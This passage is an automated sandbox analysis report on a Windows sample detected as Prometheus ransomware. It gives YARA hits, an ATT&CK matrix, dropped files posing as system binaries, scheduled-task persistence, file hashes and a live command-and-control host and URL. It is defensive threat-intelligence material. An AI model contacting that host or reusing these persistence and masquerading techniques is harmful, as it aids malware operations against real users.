            Source: Yara match | File source: 00000015.00000002.2143381456.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2030805631.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.2132989514.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.2152498750.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.2140699573.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.2153356357.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.2085969443.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.2151848592.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2033527159.0000000012BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: oFAjWuoHBq.exe PID: 1372, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 3168, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ctfmon.exe PID: 7152, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ctfmon.exe PID: 6128, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Registry.exe PID: 5612, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Registry.exe PID: 6544, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 5752, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 5436, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 6596, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 2272, type: MEMORYSTR
            ATT&CK matrix by tactic (a number before a technique is the count of signatures that matched it; techniques without a number had no matches):
            Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
            Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
            Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
            Execution: 241 Windows Management Instrumentation, 1 Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
            Persistence: 1 Scheduled Task/Job, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
            Privilege Escalation: 11 Process Injection, 1 Scheduled Task/Job, 1 DLL Side-Loading, Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
            Defense Evasion: 213 Masquerading, 1 Disable or Modify Tools, 151 Virtualization/Sandbox Evasion, 11 Process Injection, 1 Deobfuscate/Decode Files or Information, 1 Obfuscated Files or Information, 2 Software Packing, 1 DLL Side-Loading
            Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
            Discovery: 241 Security Software Discovery, 1 Process Discovery, 151 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 File and Directory Discovery, 34 System Information Discovery, Remote System Discovery, System Owner/User Discovery
            Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
            Collection: 11 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
            Command and Control: 1 Encrypted Channel, 1 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
            Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
            Behavior Graph (ID: 1581832, Sample: oFAjWuoHBq.exe, Startdate: 29/12/2024, Architecture: WINDOWS, Score: 100). The graph image is not reproduced; its recoverable nodes and edges are:
            • Start -> started oFAjWuoHBq.exe, Registry.exe, StartMenuExperienceHost.exe and 6 other processes; DNS/IP node: ilusharx.beget.tech; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Antivirus detection for URL or domain, 12 other signatures
            • oFAjWuoHBq.exe -> dropped C:\Users\user\StartMenuExperienceHost.exe (PE32), C:\Users\Public\...\Registry.exe (PE32), C:\Program Files\...\ctfmon.exe (PE32) and 8 other malicious files; started tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, schtasks.exe, schtasks.exe and 13 other processes; signatures: Drops PE files to the user root directory, Uses schtasks.exe or at.exe to add and modify task schedules, Creates processes via WMI, Drops executable to a common third party application directory
            • Registry.exe -> signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Machine Learning detection for dropped file
            • tcEcURjxxClvKHXzINDGbUbctpEdgO.exe -> DNS/IP node: ilusharx.beget.tech 5.101.152.15, ports 49704, 80, BEGET-ASRU, Russian Federation

            Source | Detection | Scanner | Label
            oFAjWuoHBq.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            oFAjWuoHBq.exe | 76% | Virustotal
            oFAjWuoHBq.exe | 100% | Avira | HEUR/AGEN.1323944
            oFAjWuoHBq.exe | 100% | Joe Sandbox ML
            Source | Detection | Scanner | Label
            C:\Users\Public\AccountPictures\Registry.exe | 100% | Avira | HEUR/AGEN.1323944
            C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | 100% | Avira | HEUR/AGEN.1323944
            C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | 100% | Avira | HEUR/AGEN.1323944
            C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | 100% | Avira | HEUR/AGEN.1323944
            C:\Users\user\StartMenuExperienceHost.exe | 100% | Avira | HEUR/AGEN.1323944
            C:\Users\Public\AccountPictures\Registry.exe | 100% | Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | 100% | Joe Sandbox ML
            C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | 100% | Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | 100% | Joe Sandbox ML
            C:\Users\user\StartMenuExperienceHost.exe | 100% | Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Public\AccountPictures\Registry.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Users\user\StartMenuExperienceHost.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            http://ilusharx.beget.tech/ | 100% | Avira URL Cloud | malware
            http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs | 100% | Avira URL Cloud | malware
            http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i38 | 100% | Avira URL Cloud | malware
            http://ilusharx.beget.tech | 100% | Avira URL Cloud | malware
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            ilusharx.beget.tech | 5.101.152.15 | Active: true | Malicious: true | Reputation: unknown
              Name | Malicious | Antivirus Detection | Reputation
              http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs | Malicious: true | Avira URL Cloud: malware | Reputation: unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i38 | Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003222000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: malware | Reputation: unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003222000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
              http://ilusharx.beget.tech/ | Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003219000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2088975523.00000000137A8000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: malware | Reputation: unknown
              http://ilusharx.beget.tech | Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: malware | Reputation: unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                5.101.152.15 | ilusharx.beget.tech | Russian Federation | 198610 | BEGET-ASRU | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1581832
                Start date and time: 2024-12-29 03:36:07 +01:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 7m 32s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed: 28
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: oFAjWuoHBq.exe
                renamed because original name is a hash value
                Original Sample Name: 97177514cab51539083ef130f005bbd1.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@26/20@1/1
                EGA Information: Failed
                HCA Information: Failed
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target Registry.exe, PID 5612 because it is empty
                • Execution Graph export aborted for target Registry.exe, PID 6544 because it is empty
                • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 5436 because it is empty
                • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 5752 because it is empty
                • Execution Graph export aborted for target ctfmon.exe, PID 6128 because it is empty
                • Execution Graph export aborted for target ctfmon.exe, PID 7152 because it is empty
                • Execution Graph export aborted for target oFAjWuoHBq.exe, PID 1372 because it is empty
                • Execution Graph export aborted for target tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, PID 2272 because it is empty
                • Execution Graph export aborted for target tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, PID 3168 because it is empty
                • Execution Graph export aborted for target tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, PID 6596 because it is empty
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time | Type | Description
                03:36:57 | Task Scheduler | Run new task: ctfmon path: "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
                03:36:57 | Task Scheduler | Run new task: ctfmonc path: "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
                03:36:57 | Task Scheduler | Run new task: Registry path: "C:\Users\Public\AccountPictures\Registry.exe"
                03:36:57 | Task Scheduler | Run new task: RegistryR path: "C:\Users\Public\AccountPictures\Registry.exe"
                03:36:57 | Task Scheduler | Run new task: StartMenuExperienceHost path: "C:\Users\user\StartMenuExperienceHost.exe"
                03:36:57 | Task Scheduler | Run new task: StartMenuExperienceHostS path: "C:\Users\user\StartMenuExperienceHost.exe"
                03:36:57 | Task Scheduler | Run new task: tcEcURjxxClvKHXzINDGbUbctpEdgO path: "C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
                03:36:57 | Task Scheduler | Run new task: tcEcURjxxClvKHXzINDGbUbctpEdgOt path: "C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
                21:37:01 | API Interceptor | 6x Sleep call for process: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe modified
                No context
                No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
BEGET-ASRU | Setup.exe | Get hash | malicious | Vidar | Browse | 45.130.41.93
BEGET-ASRU | Setup.exe | Get hash | malicious | Vidar | Browse | 45.130.41.93
BEGET-ASRU | xoJxSAotVM.exe | Get hash | malicious | Vidar | Browse | 5.101.153.57
BEGET-ASRU | botnet.x86.elf | Get hash | malicious | Mirai, Moobot | Browse | 185.155.118.34
BEGET-ASRU | splppc.elf | Get hash | malicious | Unknown | Browse | 81.200.117.158
BEGET-ASRU | arm5.elf | Get hash | malicious | Unknown | Browse | 193.168.46.153
BEGET-ASRU | file.exe | Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar | Browse | 87.236.16.19
BEGET-ASRU | GNUCXbYadp.exe | Get hash | malicious | DCRat | Browse | 5.101.153.48
BEGET-ASRU | t8xf0Y1ovi.exe | Get hash | malicious | DCRat | Browse | 185.50.25.59
BEGET-ASRU | AYUGPPBj0x.exe | Get hash | malicious | DCRat | Browse | 5.101.153.173
                No context
                No context
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with very long lines (360), with no line terminators
                Category:dropped
                Size (bytes):360
                Entropy (8bit):5.867147855537292
                Encrypted:false
                SSDEEP:6:DDDfHm0qRD6ZgRZCpEkbAHR6mB6VkOY//Wl71ggl5LwaWvgSREWAT4N3m4n:S0qRD6ZOCpRbK4mB8I//wJPLPoXRPk4r
                MD5:65337E1E01ADC71CA1C0B6102E1D7B04
                SHA1:6B585BCCE1BE7DC27980AD8A955AFD884DF1082D
                SHA-256:0E5802489D43DFCAB4DF9026583F383B7FB98A8DA94EE4771F5C580C77A54E84
                SHA-512:7EF8D2672B2A8FBE2E2C22C5CC9B647E319FA936A0261BD19B4D9BD621C2C7954A2EAF86A0D89B8AD4DD9578371570E02E70AB3196ACFB46BC96BFE7170F3EA0
                Malicious:false
                Preview:fQ6DDRxELIGfUWbvWGZi5SzXYsOZzSLFJsoTtfh6BfNry78CwmuRtdaNajpUCXP27AWlsHC0idgaEIiatLmMh4WpSa2J0M3nPVuxlXUoj4sQ6AJSAOl0uCUCoqTRP29Wj3KtXvzW18nnLFtRRjJmkC2NAsI4DDZr4WqD0Z5OYP9wZr0j7B9psWvgA6tpm5Sxj5tzZpb2o4OVDGyT1j7BEt8hkJD4qPlc6MNd7AJRkHBxIad3IayD8Qtz6LPPmhLYSvY13UV0Zpb7sKZKqJwQbiepcXhvv3oD5mfWBmAxE7nSzwHvwEjdu46uRsYfxjFfBXBGpCIDI8Le4M0qQv8qUKSBquFSNe9f2HQbuBFu
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):2403328
                Entropy (8bit):7.606495823005762
                Encrypted:false
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                MD5:97177514CAB51539083EF130F005BBD1
                SHA1:49E2661EE3E8F6FD6B06334B00543590ED8FE208
                SHA-256:500A74281DE1BC8E6EB4E08EB8705235F4436CCB209ECACA91FE4AD43A869015
                SHA-512:7CE6E7255D482B7C78F759098F9744F5F0EF462A79AD061D19F8036061B807963C924665BBE66E23E26A36990B5849D527B750AB6D0E9F6010CF4D665EC3D897
                Malicious:true
                Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 79%
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with very long lines (887), with no line terminators
                Category:dropped
                Size (bytes):887
                Entropy (8bit):5.896641342105787
                Encrypted:false
                SSDEEP:24:7PSgaLN4UgnR/HcGykPUVHKbnYsC8gWlwH022:7CCO8PUVHKbnZC66UZ
                MD5:B8AA55245CBCC7D768DD5294925E46EF
                SHA1:E0EB5D769BD7496F7B165AAF1B5992136E0D133E
                SHA-256:B3E0DE98BD7BD4E62D0BD4322A5EA40ED7F94C8C94ED2587ED766841919B3B3C
                SHA-512:D8A748E9BA809199C64A17D8062CB2879E2C7E73CC61D6CE5BC16CE27972DE0D8A5A437D0F97AFA354FFFFDE83D8D2E22F8B37D544E988005C1C657B41D63471
                Malicious:false
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):2403328
                Entropy (8bit):7.606495823005762
                Encrypted:false
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                MD5:97177514CAB51539083EF130F005BBD1
                SHA1:49E2661EE3E8F6FD6B06334B00543590ED8FE208
                SHA-256:500A74281DE1BC8E6EB4E08EB8705235F4436CCB209ECACA91FE4AD43A869015
                SHA-512:7CE6E7255D482B7C78F759098F9744F5F0EF462A79AD061D19F8036061B807963C924665BBE66E23E26A36990B5849D527B750AB6D0E9F6010CF4D665EC3D897
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 79%
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with very long lines (513), with no line terminators
                Category:dropped
                Size (bytes):513
                Entropy (8bit):5.853385694407891
                Encrypted:false
                SSDEEP:12:8s0mMg1js7N0e5i8sucfYzdiYWgk5OwVp0xyRTjDGUrK:8s0mVjs7NBAssYMYW90YHDK
                MD5:B38ADFF08665546ACAA73A0C8382AA22
                SHA1:404E7FADD82B04E1010D6E07D418626C784F9082
                SHA-256:D9A8A2347FA28D1DFB995A407FD375EB745072A5B6652A456E500372A156FC25
                SHA-512:62DBD782914E3ECAE1F9CEA3EB9DE254925AEBF94B3A46A7E7130447478945403E90564A1D2EF28AD6A622D684FE77018BAD5DCA2EE27473292625548C1C2C02
                Malicious:false
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):2403328
                Entropy (8bit):7.606495823005762
                Encrypted:false
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                MD5:97177514CAB51539083EF130F005BBD1
                SHA1:49E2661EE3E8F6FD6B06334B00543590ED8FE208
                SHA-256:500A74281DE1BC8E6EB4E08EB8705235F4436CCB209ECACA91FE4AD43A869015
                SHA-512:7CE6E7255D482B7C78F759098F9744F5F0EF462A79AD061D19F8036061B807963C924665BBE66E23E26A36990B5849D527B750AB6D0E9F6010CF4D665EC3D897
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 79%
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):2403328
                Entropy (8bit):7.606495823005762
                Encrypted:false
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                MD5:97177514CAB51539083EF130F005BBD1
                SHA1:49E2661EE3E8F6FD6B06334B00543590ED8FE208
                SHA-256:500A74281DE1BC8E6EB4E08EB8705235F4436CCB209ECACA91FE4AD43A869015
                SHA-512:7CE6E7255D482B7C78F759098F9744F5F0EF462A79AD061D19F8036061B807963C924665BBE66E23E26A36990B5849D527B750AB6D0E9F6010CF4D665EC3D897
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 79%
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with very long lines (881), with no line terminators
                Category:dropped
                Size (bytes):881
                Entropy (8bit):5.90199845483913
                Encrypted:false
                SSDEEP:12:8YioT1+fjX5fmPk76AR4sLaFARGHFqH19bTWTA+JotgSda2btdK8bgLGiN1VR:8XoTEXVmPm5oFARYc3z3dXK8SDVR
                MD5:45A2C020098D39F6D272A99733CED4FC
                SHA1:6F4F7AC158FA9CB69CCB3902572975D5DE948DC4
                SHA-256:2920B55DCB0FE9C9E6B0CE7F6A2BBBA0C0301BD5BA8AB074A289476B60932C0B
                SHA-512:2EC37942755E24F282137C401B180F86AC41F2DCF0FA241A2EE87C9C74C18CF897817416EC8ADC6DFDB6B1B08FEFA54556828A0D76974C9F2A61DEFD55396234
                Malicious:false
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with very long lines (899), with no line terminators
                Category:dropped
                Size (bytes):899
                Entropy (8bit):5.903056383407969
                Encrypted:false
                SSDEEP:12:CVxqgthUYThHkKUB0f7PVerBzDzeo/RhRluOzHvAcAhktEOUMmXUTT1NQNWKvQn:0xqghUwHkKjr8Z/xJz4cCkEvET/ovQn
                MD5:485B5E53DEAB0E068BF976D8610ED3FE
                SHA1:8420520739388D7765DC844520F121CA7490665A
                SHA-256:D95C76F3D8C37182C6F47D3F51FAA6F090530434447627B5B9B0B778E30D30C0
                SHA-512:E0F19BEDB06ECFBA583B34805677E0B851269A9C1EF7376F2BF33B51CF2BCE5310B601BBAE7459D11FD50C641814046D25046306DD17EA92A5DFB4FDD7747EEC
                Malicious:false
                Process:C:\Users\Public\AccountPictures\Registry.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\Users\user\StartMenuExperienceHost.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
